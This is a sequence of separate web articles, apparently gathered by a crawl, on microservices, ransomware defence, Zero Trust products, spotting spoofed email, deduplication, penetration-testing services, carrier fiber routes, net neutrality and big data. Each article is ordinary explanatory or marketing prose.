We might ask the same thing of microservices which, when applied to existing monolithic applications, seeks to essentially restore the application by replacing functions with a complementary services. Functions are small (or should be), by design, and thus the term “micro” is applied to the resulting, decoupled services. The differences between the two can be viewed in terms of communication. In a monolithic application functions are invoked by referencing a specific address in memory. In a microservices-based application, functions (services) are invoked by referencing a specific IP address in the network.
Conceptually, the two are the same, with only the mechanism for invocation of individual functional components differing. A resulting diagram would show essentially little difference but that the monolith’s “box” is a single server and the microservices’ “box” is the entire data center.One uses localized addressing, the other network addressing. The code for each of these functions could be exactly the same, just like the wood in Theseus’ ship.
But its business functions remain consistent and, in fact, if we’ve properly decomposed the application the user should see no discernable difference between the two. One could argue that from the perspective of the passenger on Theseus’ ship, there is no difference between the two. Nor should there be.
But philosophers tend to dig deeper, and, like them, so must we, because the difference between a monolithic application and a microservices-based one are, in fact, quite important to operations.
Microservices simplifies many aspects of the application development process but in doing so creates a great deal of operational complexity. The number of network connections between the disparate parts of a microservices-based application necessarily require associated overhead in managing the various network characteristics required: IP addresses, VLANs, NAT tables, and more. Scalability, too, becomes a challenge that even Dijkstra might find frustrating as placement of the microservices and load balancing service has a very real impact on performance based on how many segments in the network must be traversed.
Additional policies are suddenly required, for the security policies applicable to one service that directly access a sensitive data source are not those that are necessary to secure another service that manages preferences or session state. The resulting web of micro-security policies certainly provides many of the same benefits as microservices themselves, that is finer-grained control and a kind of elegant simplicity, but at the same time becomes an operational nightmare as policies must suddenly move with services, wherever they might pop up in the architecture.
Deployment, too, suddenly becomes exponentially more difficult, like moving from a simple box-step dance to the more complicated Flamenco, with many more steps and a lot more movement across the dance floor (data center). Orchestration and automation become a requirement to ensure the consistency and predictability necessary to move all the pieces into place at the right time.
Those responsible for providing these network and security services for applications need to recognize that the ship is not the same, no matter what the fifty-foot thousand view may be. It sounds simple; one application is simply replaced by ten services. Voila! The app has been recreated, just like Theseus’ ship. But from the operational perspective this ship is not the same at all. The joins (integration) in the new ship are completely different, which can change the friction created against the sea (network) and tend to cause the ship to sail more slowly.
Microservices are still emergent. They aren’t taking over the world (yet) but it’s important to recognize that it isn’t as simple a matter as tearing down Theseus’ ship and rebuilding it. Network and security service operations teams must take the philosopher’s view rather than the passenger (user) view because the impact on the network and on security is very, very different. | <urn:uuid:000fbf50-6ffa-44a3-8671-a3e222b72f6c> | CC-MAIN-2022-40 | https://www.f5.com/fr_fr/company/blog/the-application-of-theseus-paradox | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00393.warc.gz | en | 0.957273 | 934 | 2.5625 | 3 |
Ransomware is a specific type of malicious software (aka malware) that locks up your devices or an organization’s data in order to ransom that access back to you – sometimes to the tune of millions of dollars. Computers lock up, data disappears, or files become encrypted with no way to recover them. The hacker will then contact their victim to issue conditions for payment to retrieve access. Not only has this cost many businesses millions of dollars, but there is never a real guarantee that paying the ransom will get you back your access. For this reason, law enforcement agencies don’t recommend paying it, but many companies do so anyway.
The big question of the day is how should organizations protect themselves against these targeted attacks? What is the best solution for preventing a ransomware attack? And, if you become a victim, how should you respond? Fortunately, while there is no way to defend against these malicious attacks completely, there is a way to build layers of defense into your cybersecurity strategy to mitigate the fallout of an infiltration.
Ransomware Attack Vectors
Verizon’s 2022 Data Breach Investigations Report (DBIR) highlights four key paths to breaches believed to contribute to ransomware invasions. They are, botnets, exploiting an organization’s system vulnerabilities, phishing and stolen credentials.
Botnets are a network of computers that have been hijacked with malware. The hacker gains the ability to remotely control a victim’s network to do things like mine cryptocurrency or send spam. These can also be leveraged to launch a ransomware attack when different cybercriminals partner up to compromise a system.
System vulnerabilities are technical issues that can lead to attacks. While these kinds of breaches have doubled in the last year, they make up only 7% of successful data breaches. This vector includes bugs in your product, firewall issues, and unpatched system exploits. Third-party vendors, partners, and supply chains can also leave organizations vulnerable.
Phishing is the most likely attack vector used to infiltrate a user’s system or hacking to hijack your system passwords. Phishing scams are becoming incredibly sophisticated, so even the savviest users fall into this trap. According to the DBIR, 35% of ransomware incidents involve the use of email.
However, of all the methods, stealing credentials via simple hacking methods is still one of the simplest and most direct ways to penetrate an organization’s security. Too many users rely on weak passwords – the most common security vulnerability – to protect their accounts. In 2019, weak passwords caused 30% of ransomware infections, and it’s still a major problem for organizations in 2022.
Weak Passwords and Ransomware: A Perfect Pair
Criminals know quite a few methods to steal your credentials, from dictionary attacks to password spraying. And weak passwords are the driving force behind the success of these attacks. When users create passwords that hackers have already exposed in previous data breaches or with common words, combinations, and phrases, threat actors can use relatively easy methods like credential stuffing and password spraying to crack an account. It’s a numbers game that favors the assailant.
When passwords are created with these weaknesses, even encrypting passwords isn’t enough to prevent an attack. Advanced security measures just aren’t enough to protect your networks and systems if your employees and users aren’t building strong, unique, and uncompromised passwords. Unfortunately, this leaves too many organizations with a false sense of security regarding their susceptibility to a ransomware incident.
When hackers infiltrate an organization this way, it’s simple to log in and download malware that will interfere with data backups, encrypt system access, or even spread malignant code to other devices connected to the network.
So, You’re the Victim of a Ransomware Attack: What Now?
Ransomware response can vary greatly depending on your business. Experts recommend shutting down your network to stop the spread of malware once you become aware of an event. Disconnect all devices known to be infected, and consider disabling network connections. Before restoring anything from a backup, you need to ensure that your backups haven’t been compromised too. Employ a clean network to reinstall the OS, and run trusted antivirus software. And always remember that paying a ransom to get your critical business systems back online as fast as possible might be tempting, but it could end up netting you nothing in return. More information can be found in the NCSC guide: Technical Approaches to Uncovering and Remediating Malicious Activity.
Taking the Initiative to Prevent a Payout
According to the DBIR, ransomware attacks are rising rapidly. They make up 25% of total breaches and have increased 13% over the previous year. This surge is greater than the last five years combined. Criminals have discovered that ransomware attacks can net significant profit and are accelerating their efforts to penetrate more businesses and industries worldwide.
The best course of action you can take now is to implement and reinforce a layered defensive strategy before a threat actor comes for your systems. This means being proactive by taking steps like scheduling regular backups for your most important files, practicing good password hygiene, and promoting a cybersecure culture across your organization. Ransomware is a complex problem that is only getting worse as criminals get more creative. Businesses need to address every threat vector and build out multiple safeguards on different fronts to be ready in the event of a ransomware attack. We all need to do our part to stop cybercriminals from profiting from gaps in our security. | <urn:uuid:38980769-35de-4ac5-9b92-394ee6dd2402> | CC-MAIN-2022-40 | https://www-internal.enzoic.com/ransomware-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00393.warc.gz | en | 0.934516 | 1,135 | 2.6875 | 3 |
What is Zero Trust?
The simplest description of Zero Trust is that nothing in a network environment should be trusted until it is validated against a list of known values. This means users, systems, and processes are all validated prior to any action being authorized, whether that is a login (access), an automated process, or a privileged activity (authorization).
Using this approach, nothing in the network is assumed to be trustworthy until it has been verified. Even when a process or command is validated, strong controls are put in place to ensure that any potentially damaging activities are tightly restricted to limit possible damage to revenue generating systems.
Cyberwarfare differs from the traditional warfare models that most people understand in one significant way – it is entirely defensive in nature, and there are no offensive capabilities in a corporate environment. Unfortunately, within the realm of legality, the only option for corporations is to be able to withstand an attack from an external adversary. Developing defensive strategies, and monitoring the perimeter of the network are literally the first line of defense in the protection of a corporate network. The Zero Trust model brings a lot of focus to the potential that something, or someone within the network perimeter has been compromised. This has often been overlooked in most cyber-defense strategies because the focus has been on external threats, and the assumption has been that the internal network is safe and trustworthy.
Corporate network environments have traditionally been built with the idea of securing an external perimeter against penetration from external sources. Although this is a good starting point, it does little or nothing to secure an environment from an internal threat. Nobody likes to think that someone inside their network would do something to cause a security compromise, whether inadvertently, or deliberately, but common-sense dictates that this must be considered in a healthy security program.
It is important that the reality of an internal threat be confronted directly in a security program. Although every effort is made to ensure that users are thoroughly vetted during the hiring process, seldom do programs account for changes once the initial background checks are run, or baseline scans are run on servers.
Originally proposed in 2010, the Zero Trust security model in its purest form has largely been determined to be impractical in most customer environments. Discussions related to implementing this model are often heated, and tend to devolve to an ‘all or nothing’ disagreement over whether it should, or can, be practically implemented in a corporate environment.
BeyondTrust products support the practical and intelligent implementation of elements of a Zero Trust security model in corporate networks using pieces that make sense but don’t hamper productivity. This hybrid approach provides companies with the ability to select the parts of the Zero Trust model that make sense to implement in their environment with a common-sense approach toward long-term security. Ultimately, the goal of any corporate computing network is to assist with revenue generation, so implementing controls that don’t interfere with that goal is important to the bottom line.
BeyondTrust and “Zero Trust”
The key to implementing elements of Zero Trust within a corporate network is to concentrate on controls that restrict access from point to point within the network environment, and detect unusual activity rapidly. Restricting lateral movement within the network, or the ability to move from point to point once access is granted is key to this strategy. BeyondTrust products offer the ability to help in this area.
PowerBroker Password Safe (PBPS)
PowerBroker Password Safe helps discover and secure login credentials on all servers and network devices within a customer environment. In addition, discovery scanning can assist with detecting and securing newly provisioned identities on servers. Using the strong controls that authorize access to specific servers, or credentials, and scheduling capabilities, it is possible to secure servers from unauthorized access. Some of the key features that are standard in PBPS that will help to control access within an environment are:
- Access control may be limited to specific servers, or groups of servers using SmartGroup technology
- Access control may be restricted to certain times and this can be aligned to user schedules, or server maintenance windows
- Integration with major ticketing systems to validate whether an activity is authorized to take place
- Integration with identity governance (IGA) products such as Sailpoint to validate user roles and enforce role based access controls within the network
- Full Active Directory integration to validate user credentials
- Multi-Factory Authentication (MFA) is built-in to the product and works with any Radius based MFA product
- Fully configurable password rules to ensure that strong passwords are enforced on all servers and for all credentials that are managed
- Scheduled password rotation features ensure that passwords are changed regularly, and also after each use
- Included API access for automation processes to prevent having to store credentials in scripts or in other insecure sources within the network
Retina Vulnerability Management
Retina helps discover and scan assets for vulnerabilities within an environment. Applying a regular scanning schedule provides an internal and external view of the health of a customer environment.
- Regular updates provide the ability to scan for the most recent vulnerabilities usually shortly after they are identified
- Compliance and regulatory reports are available to meet most global security reporting requirements
- External scanning is available to ensure the security of the perimeter, and is often required by regulations such as PCI/DSS
- Internal scanning can constantly monitor the health of assets on a regular schedule, and reporting is integrated to bring uncharacteristic items, or discovered vulnerabilities immediately to the attention of those responsible for correcting them
PowerBroker for Unix & Linux (PBUL)
PowerBroker for Unix & Linux is an agent-based solution provides absolute control over activity on Unix and Linux operating systems. It is expected that Unix and Linux servers will comprise nearly 85% of all servers in corporate environments over the next several years. Most cloud services offer low cost Linux servers primarily, and due to the open source software model of the Linux operating system, it is a cost-effective solution for most enterprises. Developing strong controls over users and activity will be crucial to deliver peace of mind. Some of the key features that have been implemented in customer environment that provide advanced levels of control and support the Zero Trust model are:
- Full control over all identities on servers, and the ability to execute processes as any identity with access to the server using a trusted agent model
- Built-in policy language that permits complete access to, and control of the remote client operating system, policy server operating system, and with complete access to external data sources for validation
- Server information can be validated prior to authorization of any privileged activity – this is the essence of Zero Trust
- External sources can be queried to gather detailed information to confirm activities fall within the spectrum of those that are authorized
- Full control over policy server operating systems in a tamper-proof manner which provides a secure source of validation to validate secondary information
- Using the policy language, virtually any command or process that is within the capability of the operating system can be performed
- Advanced Control and Audit (ACA) features that permit the restriction of commands even within a privileged session where they may otherwise be authorized
- Full event logging of all activities that are authorized, or attempted
- Configurable keystroke and IO session logs provide irrefutable evidence of all activity that takes place within an authorized privileged access session
- Advanced policy controls permit strong access controls over servers, and sessions can be initiated using non-standard ports in very secure environments
- Privileged activities can be declined when outside of scheduled server maintenance windows, or outside user working hours
- Advanced features that permit validation of binaries, and permissions on commands prior to authorization to ensure that they are authorized
- Using trusted agent technology, it is possible to collect data from client systems to monitor for changes in server configurations, additional user ids, or other characteristics to compliment other tools in the environment
PowerBroker for Networks (PBN)
PowerBroker for Networks is designed to provide strong control over network devices where other tools cannot be installed. Typically, network devices provide little or no control over user activities once access is gained. Using PBN, it is possible to strictly validate all activity prior to execution.
- Enabling administrators to perform all of the tasks necessary to compete their jobs, while enforcing least privilege on activity.
- Using flexible policy language to dynamically query other data sources that are available in a customer environment to make policy decisions. Additional factors may include information such as:
- Job title
- Job role
- Geographic location
- Permits integration with ticketing systems to determine whether an activity is authorized
- Provide a detailed, irrefutable audit trail for all authorized activities
- Generate actionable alerts based on detected misuse
- Full session IO log recording of all privileged activities
- Comprehensive coverage of devices on which there is little or no visibility currently
- Industry leading audit reporting to reduce the cost of audit, and to enforce compliance of policies and standards in the network environment
- Role based access controls that confine activity for teams and groups to only that which is authorized
PowerBroker for Windows (PBW)
PowerBroker for Windows provides strong control over Windows operating systems on both servers and desktops. This level of granular control over program execution delivers complete control over user activity and can transparently authorize privileged or administrative activity using user group or role membership.
- Improve security with user-based rules and policy
- Control when and how rules are applied
- Improve efficiency by tracking trusted sources
- Enforce complete endpoint least privilege
- Reveals privileged application and asset security risks
- Ensure complete application control
- Reduce attack surfaces by removing admin rights from end users and employing fine-grained policy controls for all privileged access, without disrupting productivity
- Monitor and audit sessions and user activity for unauthorized access and/or changes to files and directories
- Analyze behavior to detect suspicious user, account and asset activity
- Enforce least privilege for desktops and servers
- Eliminate admin rights: prevent abuse or misuse of privileges on Windows assets
- Ensure productivity: default all users to standard privileges, while enabling elevated privileges for specific applications and tasks without requiring administrative credentials
- Allow admin where needed: proactively identify applications and tasks that require administrator privileges — and automatically generate rules for privilege elevation
- Elevate applications: elevate application as logged on or another user, without exposing credentials
BeyondInsight, the PowerBroker Privileged Access Management Platform
The PowerBroker Privileged Access Management Platform is a central interface that provides a dashboard view of activity within the network. This interface takes input from all available sources and builds a risk profile for servers, and users to baseline standard behavior. The more products that report into the console, and the larger the data set, the better the analytics. The analytics console looks at user behavior and baseline characteristics of activity, and can report when suspicious user, account, or asset activity takes place.
Practical Application of Zero Trust
Combining all of the elements of the above products, it is possible to enforce the best elements of a Zero Trust model in any corporate environment without disrupting business processes. Zero Trust is really about knowing who is doing what within your network, and making sure that in the event that something uncharacteristic happens you have the ability to respond to control or limit any threats to the network.
As a corporate information security program matures, it is possible to intelligently apply stronger controls over activity in an environment. Shifting the focus from looking at external threats primarily to take a holistic view of both internal and external activity provides a new level of protection to a corporate network. Setting aside the tradition of securing the perimeter and trusting everything internal is the first step toward implementing a Zero Trust model. Combining many risk factors, such as server maintenance windows, user work schedules, point of origin, and behavior monitoring, it is possible to achieve most aspects of Zero Trust without implementing draconian controls that would hamper creativity.
BeyondTrust is happy to help customers who have a desire to rationally implement these elements into their security program. Please contact us for further information, and to consult on how this can be approached in your environment based on your use cases and situation.
Chad Erbe, Professional Services Architect, BeyondTrust
Chad Erbe is a Certified Information Systems Security professional (CISSP), with nearly 30 years’ experience in a Unix/Linux administration role. Chad has worked in DoD high-security environments, manufacturing, and with large financial services companies throughout his career. This broad experience has lead him to an architectural role with BeyondTrust where he focuses on Privileged Access Management, particularly in the Unix suite of products. Chad also maintains his PCI ASV certification from the PCI council. | <urn:uuid:218a7fbc-98c6-4c81-9017-132a705d773c> | CC-MAIN-2022-40 | https://www.beyondtrust.com/blog/entry/zero-trust-security-model-beyondtrust-can-help | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00393.warc.gz | en | 0.924928 | 2,592 | 3.125 | 3 |
Email Spoofing Explained
What is email spoofing?
The word spoof means falsified. A spoofed email is when the sender purposely alters parts of the email to make the message appear as though it was authored by someone else. Commonly, the sender’s name/address and the body of the message are formatted to appear from a legitimate source. Sometimes, the spoofer will make the email appear to come from a private citizen somewhere.
A spoofed message can appear to be sent from a coworker, a bank, a family member or any number of seemingly trustworthy sources. A good spoof will look like any other email that you would normally receive.
Warning: If you suspect you have received a fraudulent message DO NOT click any link in the message or enter any information that is requested.
Why do people spoof email?
In many cases, the spoofed email is part of a phishing (scam) attack. In other cases, a spoofed email is used to dishonestly market an online service or sell you a bogus product. The intent is to trick the recipient into making a damaging statement or releasing sensitive information, such as passwords. If you're receiving bounced (returned) emails for messages that you never sent, this could be a case of spoofing.
Identify a spoofed message
It is vital that users understand that emails that appear to be sent from co-workers, can possibly be forged emails. This is the case w
Scammers will alter different sections of an email to disguise who the actual sender of the message is. To identify the following examples you will need to open the email headers of a message you suspect has been spoofed. Examples of properties that are spoofed:
FROM email@example.com(This will appear to come from a legitimate source on any spoofed message)
REPLY-TO This can also be spoofed, but a lazy scammer will leave the actual REPLY-TO address. If you see a different sending address here, the email may have been spoofed.
RETURN-PATH This can also be spoofed, but a lazy scammer will leave the actual RETURN-PATHaddress. If you see a different sending address here, the email may have been spoofed.
SOURCE IP address or “X-ORIGIN” address. This is typically more difficult to alter but it is possible.
These first three properties can be easily altered by using settings in your Microsoft Outlook, Gmail, Hotmail, or other email software. The fourth property above, IP address, can also be altered, but usually requires more sophisticated user knowledge to make a false IP address convincing.
In this example, it appears that the recipient has received a message from their office assistant, requesting money. The subject line should alert you immediately. This user should contact their assistant through another form of communication to confirm that they did not send this message. Next, you will want to discover who actually sent the message by opening the message headers.
In this message header snippet, we see that the From:
field shows the message being sent from "Assistant" firstname.lastname@example.org
. However, we can also see that the REPLY-TO:
field lists email@example.com
. That is a clear cut example of a spoofed message. You will want to Blacklist any address you find in the REPLY-TO
, and SOURCE IP
field that is not an address/IP you normally receive mail from.
User education is the first line of defense against these types of attacks. If a user receives a spoofed message:
- Blacklist any address/IP listed in the REPLY-TO, RETURN-PATH, or SOURCE IP that you have determined to be fraudulent.
- DO NOT click on any links contained in the suspect message.
- Immediately change your password if you or your users provided that information at any point.
- Alert the rest of your business to the situation.
Spoofing is possibly the most frustrating abuse issue to deal with, simply because it cannot be stopped. Spoofing is similar to hand-writing many letters, and signing someone else's name to it. You can imagine how difficult that would be to trace. | <urn:uuid:a5dab72d-9b2e-4cb7-bfec-97ea2e8a6be5> | CC-MAIN-2022-40 | https://support.hollandcomputers.com/kb/a207/email-spoofing-explained.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00593.warc.gz | en | 0.932609 | 891 | 3.375 | 3 |
How can deduplication help your organization value space?
Deduplication is a practice for data reduction that methodically inspects data at the sub-file level and replaces reference pointers for any redundant elements. Deduplication decreases the disk space needed to store data by 90% or more when compared to other traditional disk systems.
Working at a sub-file level is more powerful than looking at entire files.
In reality, there’s usually only one part of a file that actually changes, not the entire file. Since data deduplication works at the sub-file level, it can store only unique data. There are a few possible approaches offered – using a variable-length block system to find redundancy is the most common.
It can make a big difference whether you carry out de-duplication at the source or at the target.
Source de-duplication happens on the client or backup server as a function of the backup software. While it can cut out some network requirements, it takes up CPU cycles on host servers during the backup process, which can slow down backup and interfere with primary applications. These drawbacks make source de-duplication ideal for smaller systems, but not for bigger systems.
Target de-duplication normally gives a faster ingest, shorter backup window, and a faster turnaround for disaster recovery processes. It can also allow a single device to support different backup applications. Overall, target de-duplication is the preferred choice for larger systems.
You need to pay attention to when you de-duplicate.
If you choose to de-duplicate during ingest, you’ll use less disk but the overhead can negatively affect the backup window. If the vendor provides an adaptive buffering approach, this problem can be avoided. De-duplicating after the ingest gives faster backups, but you’ll need to reserve the disk as a landing area. | <urn:uuid:e50df5a2-254d-4400-ae1e-e6d640ba61a9> | CC-MAIN-2022-40 | https://www.jdyoung.com/resource-center/posts/view/66/how-to-tap-into-disc-space-with-data-deduplication-jd-young | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00593.warc.gz | en | 0.894466 | 396 | 2.984375 | 3 |
Identify Vulnerable Assets to Strengthen Your Security Defenses
A penetration test, also known as a pen test, is a simulated cyber attack against your computer system to check for exploitable vulnerabilities. The goal of a pen test is to determine if unauthorized access to key systems and files can be achieved. It approaches a network from the outside in order to gather intelligence and provide detailed reports that identify all threats. This includes testing firewalls, scanning open ports, and performing Secure Shell Testing (SSH) to find all network vulnerabilities.
After completing a pen test, a plan is created and security upgrades are implemented to remediate each threat or any vulnerabilities discovered during the test. Our team goes over the findings with customers to answer any questions about our findings so customers clearly understand all aspects of the reports, their risk rating, and the pathway to remediating their exposure.
Why Perform Penetration Testing
Penetration testing has become a widely adopted security practice by organizations. Whether tests are required by regulatory mandates or you’re undergoing changes in network infrastructure or policies, pen tests can help with the following:
- Provides evidence to support increased investments in security & technology
- Shows employees’ cybersecurity awareness level
- See real impact of risks and compromised end-points
- Ensure business continuity
- Reassure all stakeholders
Talk to an Expert
Our specialists are ready to tailor our security service solutions to fit the needs of your business objectives.
If you would like to learn more about penetration testing for your organization, simply fill out the form below and we will have one of our specialists contact you. | <urn:uuid:ab0c8630-c6ae-488d-9256-63103bdcf3f2> | CC-MAIN-2022-40 | https://www.comtecsolutions.com/cybersecurity/penetration-testing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00593.warc.gz | en | 0.940749 | 333 | 3.25 | 3 |
09 Aug Carrier Fiber Routes and Network Maps Explained
One of the most pivotal points in modern society is the ability to connect to the world wide web. Without efficient connections, people are left without answers, without the ability to work, and without the ability to effectively entertain among other things. At the root of the internet is actually a route, a fiber route. Fiber routes and network maps help to connect the modern world.
What are Carrier Fiber Routes and Network Maps?
Fiber routes are the physical paths on which fiber optic cable is laid connecting end users to telecommunications services. Carrier fiber routes specifically identify the unique carrier or telco provider that services that fiber optic cable. Carrier fiber or network maps are physical or digital representations of the current fiber network landscape. This information can be collected from a variety of methods, but it is essential for carriers to be accessible in these maps or data representations. This type of data is an allocated source of location-based information.
Location-Based Intelligence and Carrier Fiber
Location-Based Intelligence is the method of developing insights specifically derived from information about a location or multiple locations. When applied to telecom aspects such as carrier networks, fiber routes, fiber lit buildings, etc. it provides essential telecom data. When organizations adopt the practice of incorporating Location-Based Intelligence for carrier fiber routes it can assist with the following.
- Business Decisions
- Companywide Analysis
- Competitive Analysis
- Marketing Efforts
- Monitoring Tasks
- And More
To gain all the benefits associated with this data users must know the options for accessing the information.
Locating Nationwide Network Information Online
There are a few methods for acquiring fiber routes and carrier networks online. Data users can research locations individually. This method poses issues with the lack of information and guarantee of updated data. Users can research carriers individually, but this method can prove to also have a lack of information and can be time costly. The safest method for location carrier fiber route data online is with a trusted data provider, such as GeoTel.
Locating Network Information by State
It can be intimidating if an organization or individual is seeking information on fiber routes and maps for a country, but also for an entire state. More and more organizations are seeking carrier fiber routes and carrier networks as new businesses emerge with an increase in tax incentives from the local government. As new areas develop on a statewide basis, data users need a better understanding of the fiber landscape now more than ever.
Knowing the fiber landscape, such as where the most reliable and lowest latency connections are located can provide a large advantage over your competition. Voice, video, and other types of telecommunications are essential aspects of business operations. “Knowing where carrier fiber routes are can offer businesses the connection they need to a secure and fast network. For example, [in Missouri] Blue Bird Network offers a network with reliable, scalable, and secure connections to data centers, wireless towers, other business locations, etc.” Some states, such as Texas, might pose greater challenges to finding fiber routes easily as if you were searching in a citywide radius.
Locating Network Information for Local Environments
For individuals seeking carrier fiber route information for a specific address or city block, options of location information can be somewhat simpler. Data users can physically visit locations on foot or search remotely via drone. However, these options provide limited information. It does not provide the actual Carrier Fiber Route or the Carrier Network Map, but it does show the carriers in the area. For users seeking accurate and abundant information, the best course of action is to source the information from a trusted provider.
Benefits of Carrier Fiber Routes Data
Knowing the fiber landscape can benefit almost any industry. Carrier fiber route data “allows companies and organizations to view, analyze, and understand data in a way that reveals patterns, relationships, and trends.” Having fiber route and carrier network data provides users with location-based information and the impact this tool can have mentioned above.
The benefits of carrier routes data can include:
- Predictive Analytics
- Fraud Detection
- Informed Business Decisions
- Customer Segmentation and Analysis
- Competitive Analysis
- Product and Market Development
As discussed, acquiring carrier fiber route data and carrier network maps can be time-consuming and unreliable in some cases. Selecting a trusted data source is essential for organizations and users. GeoTel offers a reliable solution, while being in business for over 20 years. This company has proved that it can sustain itself as a reliable data option. GeoTel also offers the largest and most accurate telecom database available. By employing a Living Database, the company is able to provide real-time data statistics and updates. Contact GeoTel to access location-based information on carrier fiber routes and network maps today!
Written by: Valerie Stephen | <urn:uuid:20679295-0eff-4a59-b429-b8a9ca061a50> | CC-MAIN-2022-40 | https://www.geo-tel.com/carrier-fiber-routes-and-network-maps-explained/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00593.warc.gz | en | 0.914055 | 978 | 3.09375 | 3 |
Sometimes you don’t know what you have until it’s gone.
Consider, for example, net neutrality – the guiding principle of the internet since its beginning.
The intent of net neutrality is to keep the internet free and open for everyone. This means that in the U.S., we can share and access information without interference.
In 2015, in response to public pressure, the Federal Communications Commission (FCC) formally adopted net neutrality rules. Less than two years later, following the election of the new administration, the FCC voted to dismantle the net neutrality rules.
Under the net neutrality protections passed in 2015, Internet Service Providers (ISPs) are not permitted to block or otherwise hinder access to content. Specifically, they cannot speed up, slow down or block any content, applications or websites that you may want to use or visit.
Without the protections that net neutrality affords, it’s possible that companies like AT&T, Comcast and Verizon will decide to block or slow down online content.
One way they may do this is by establishing “fast lanes.” Fast lanes are essentially a system of paid prioritization in which an ISP charges certain companies an additional fee to carry their content.
For example, Verizon or Comcast could charge sites and services like YouTube or Netflix more in exchange for faster loading and streaming times. Online platforms that don’t (or can’t) pay would be relegated to “slow lanes.”
Consumers also could be charged additional fees to access certain types of streaming content such as sports or music on the fast lane. Of course, consumers will ultimately be on the hook for the cost of additional fees charged to platforms such as Netflix to use the fast lane.
Why we support net neutrality
Future Link is fully in favor of net neutrality. We believe that consumers who pay to be connected to the internet should not have the performance or cost of their service determined by the content they consume.
Net neutrality is crucial for small business owners, startups and entrepreneurs. They rely on the open internet to reach their customers. Without the protections of net neutrality, ISPs could charge businesses more for the fast lane. If they can’t afford it, they’ll be stuck in the slow lane.
To quote an analogy from a recent article at theguardian.com:
- Imagine they (private road owners) were allowed to charge companies different amounts to use them (roads), so that companies with enough cash could pay for exclusive use of fast lanes, leaving their smaller competitors consigned to lag behind on slow, badly maintained roads. Sounds outrageously anti-competitive, doesn’t it?
Want to learn more about net neutrality and what you can do to help restore its protections? | <urn:uuid:8f243f44-67d2-4f4b-b226-4ca89db3bb2f> | CC-MAIN-2022-40 | https://futurelinkit.com/care-net-neutrality-want-unrestricted-access/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00593.warc.gz | en | 0.943845 | 571 | 3.15625 | 3 |
The answers you get to the question “What is big data?” will typically depend on the perspective of whomever you’re asking. During the late 1990s and early 2000s, when the term first came to prevalence, a quantitative definition of big data might have described it as any piece or set of information greater than a gigabyte (1 GB) in size. These days, that amount of information could comfortably sit on a memory chip the size of your thumbnail in an age where big data is reckoned in terms of petabytes, exabytes, and zettabytes of information.
A more subjective definition might describe it in terms of the huge volume of information being continuously generated by people, technology, and transactions, the velocity with which it’s appearing (along with the speed with which it needs to be processed and analyzed), and the vast variety of sources that contribute to it.
Looking at big data from a qualitative perspective – and taking into account that structured, unstructured, and semi-structured information sources contribute to the world’s data store – it’s possible to define big data as information that’s so extensive, vast, or complex that it’s difficult or impossible to process using traditional methods and technology.
Volume relates to the sheer size of the data sets involved. With information coming from business transactions, smart devices (IoT or Internet of Things), industrial equipment, videos, social media, and other streams, it’s now commonplace to measure big data in terms of petabytes (1,024 terabytes) or exabytes (1,024 petabytes) of information and even larger denominations, running to billions or even trillions of records.
Velocity refers both to the rate at which new information is being generated and to the speed desired or necessary for it to be processed for timely and relevant insights to become available. With mission-critical data coming from RFID (Radio Frequency Identification) tags, connected sensors, smart meters, and the like, the velocity of processing and analysis of big data often needs to be real-time.
Variety is an indication of the multitude and diversity of information sources that make up big data. This runs the gamut from numerical data in traditional databases, through multimedia streams of audio and video, to financial transactions, text documents, emails, and metadata (information about information).
At a more fundamental level, it may be characterized in terms of being structured, semi-structured, or unstructured.
Structured data takes a standard format capable of representation as entries in a table of columns and rows. This kind of information requires little or no preparation before processing and includes quantitative data like age, contact names, addresses, and debit or credit card numbers.
Unstructured data is more difficult to quantify and generally needs to be translated into some form of structured data for applications to understand and extract meaning from it. This typically involves methods like text parsing, natural language processing, and developing content hierarchies via taxonomy. Audio and video streams are common examples.
Semi-structured data falls somewhere between the two extremes and often consists of unstructured data with metadata attached to it, such as timestamps, location, device IDs, or email addresses.
Besides these big data characteristics described, data analysts also need to consider the ingestion (taking in), harmonization (cleaning and balancing), analysis, visualization, and democratization (making readily available to all relevant stakeholders) of data sources, and the results of big data analysis.
Information is an integral component of our daily lives. From the answers we get to our queries and searches online, to the databases underlying the operations of the essential services and businesses we deal with, to the algorithms helping to regulate our transport, social media, and the delivery of utilities.
In all cases, data management helps to move big data efficiently to where it’s needed. Data analytics enables scientists to build statistical models and visualizations to help make sense of it, and domain knowledge provides the expertise to interpret the results from data analysis.
The impact of big data on society may be assessed in terms of the numerous areas where it affects communities, economies, and the environment: weather prediction, forecasting natural disasters, urban and community planning, traffic management, logistics, and healthcare are just some of the areas that determine why big data is important.
The importance of big data to commercial organizations is now synonymous with the importance of business analytics. The science of collecting and analyzing business intelligence (BI) and other relevant information to extract insights that can inform decision-making processes, boost operational and cost efficiencies, create a better understanding of markets and consumers, and ultimately boost the bottom line.
Organizations that have figured out how to implement data analytics successfully follow a number of best practices, including:
Though the term has been part of our general vocabulary since at least 2005, when Roger Mougalas from O’Reilly Media coined it (other sources credit John R. Mashey of Silicon Graphics, in the early 1990s), the history of big data actually has its roots in antiquity. For example, around 300 BC, the ancient Egyptians under Alexander the Great tried to capture all existing stores of information in the library of Alexandria. Later, military scientists of the Roman Empire would analyze field statistics to determine the optimal distribution for their armies.
Both were attempts to aggregate and organize huge repositories of information relevant to the business of the day so that experts and scholars could analyze this data and apply it for practical purposes.
In the modern era, the evolution of big data can be roughly subdivided into three main phases.
